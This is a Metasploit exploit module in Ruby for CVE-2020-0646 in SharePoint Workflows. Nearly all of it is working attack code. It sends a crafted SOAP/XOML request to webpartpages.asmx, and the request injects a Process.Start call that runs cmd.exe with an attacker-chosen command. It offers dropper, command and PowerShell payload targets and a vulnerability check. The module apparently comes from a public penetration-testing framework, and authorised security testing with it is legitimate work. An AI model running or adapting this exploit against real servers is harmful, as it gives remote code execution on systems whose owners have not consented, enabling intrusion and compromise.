SharePoint Workflows XOML Injection Exploit

# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Powershell
  include Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'SharePoint Workflows XOML Injection',
      'Description' => %q{
        This module exploits a vulnerability within SharePoint and its .NET backend
        that allows an attacker to execute commands using specially crafted XOML data
        sent to SharePoint via the Workflows functionality.
      },
      'Author' => [
        'Spencer McIntyre',
        'Soroush Dalili'
      ],
      'License' => MSF_LICENSE,
      'References' => [
        ['CVE', '2020-0646'],
        ['URL', 'https://www.mdsec.co.uk/2020/01/code-injection-in-workflows-leading-to-sharepoint-rce-cve-2020-0646/']
      ],
      'Platform' => 'win',
      'Targets' => [
        [ 'Windows EXE Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper } ],
        [ 'Windows Command', { 'Arch' => ARCH_CMD, 'Type' => :windows_command, 'Space' => 3000 } ],
        [ 'Windows Powershell',
          'Arch'         => [ARCH_X86, ARCH_X64],
          'Type'         => :windows_powershell
        ]
      ],
      'DefaultOptions' => {
        'RPORT' => 443,
        'SSL'   => true
      },
      'DefaultTarget' => 0,
      'DisclosureDate' => '2020-03-02',
      'Notes' =>
      {
        'Stability'   => [CRASH_SAFE,],
        'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
        'Reliability' => [REPEATABLE_SESSION],
      },
      'Privileged' => true
    ))

    register_options([
      OptString.new('TARGETURI', [ true, 'The base path to the SharePoint application', '/' ]),
      OptString.new('DOMAIN',    [ true, 'The domain to use for Windows authentication', 'WORKGROUP' ]),
      OptString.new('USERNAME',  [ true, 'Username to authenticate as', '' ]),
      OptString.new('PASSWORD',  [ true, 'The password to authenticate with' ])
    ])
  end

  def check
    res = execute_command("echo #{Rex::Text.rand_text_alphanumeric(4 + rand(8))}")
    return CheckCode::Unknown('Did not receive an HTTP 200 OK response') unless res&.code == 200

    compiler_errors = extract_compiler_errors(res)
    return CheckCode::Unknown('No compiler errors were reported') unless compiler_errors&.length > 0

    # once patched you get a specific compiler error message about the type name
    return CheckCode::Safe if compiler_errors[0].to_s =~ /is not a valid language-independent type name/

    CheckCode::Vulnerable
  end

  def extract_compiler_errors(res)
    return nil unless res&.code == 200

    xml_doc = res.get_xml_document
    result = xml_doc.search('//*[local-name()=\'ValidateWorkflowMarkupAndCreateSupportObjectsResult\']').text
    return nil if result.length == 0

    xml_result = Nokogiri::XML(result)
    xml_result.xpath('//CompilerError/@Text')
  end

  def exploit
    # NOTE: Automatic check is implemented by the AutoCheck mixin
    super

    case target['Type']
    when :windows_command
      execute_command(payload.encoded)
    when :windows_dropper
      cmd_target = targets.select {|target| target['Type'] == :windows_command}.first
      execute_cmdstager({linemax: cmd_target.opts['Space']})
    when :windows_powershell
      execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))
    end
  end

  def escape_command(cmd)
    # a bunch of characters have to be escaped, so use a whitelist of those that are allowed and escape the rest as unicode
    cmd.gsub(/([^a-zA-Z0-9 $:;\-\.=\[\]\{\}\(\)])/) { |x| "\\u%.4x" %x.unpack('C*')[0] }
  end

  def execute_command(cmd, opts = {})
    xoml_data = <<-EOS
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <ValidateWorkflowMarkupAndCreateSupportObjects xmlns="http://microsoft.com/sharepoint/webpartpages">
      <workflowMarkupText>
        <![CDATA[
          <SequentialWorkflowActivity x:Class="MyWorkflow" x:Name="foobar" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/workflow">
            <CallExternalMethodActivity x:Name="foo" MethodName='test1' InterfaceType='System.String);}Object/**/test2=System.Diagnostics.Process.Start("cmd.exe", "/c #{escape_command(cmd)}");private/**/void/**/foobar(){//' />
          </SequentialWorkflowActivity>
        ]]>
      </workflowMarkupText>
      <rulesText></rulesText>
      <configBlob></configBlob>
      <flag>2</flag>
    </ValidateWorkflowMarkupAndCreateSupportObjects>
  </soap:Body>
</soap:Envelope>
    EOS

    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, '_vti_bin', 'webpartpages.asmx'),
      'ctype'    => 'text/xml; charset=utf-8',
      'data'     => xoml_data,
      'username' => datastore['USERNAME'],
      'password' => datastore['PASSWORD']
    })

    unless res&.code == 200
      print_error('Non-200 HTTP response received while trying to execute the command')
    end

    res
  end
end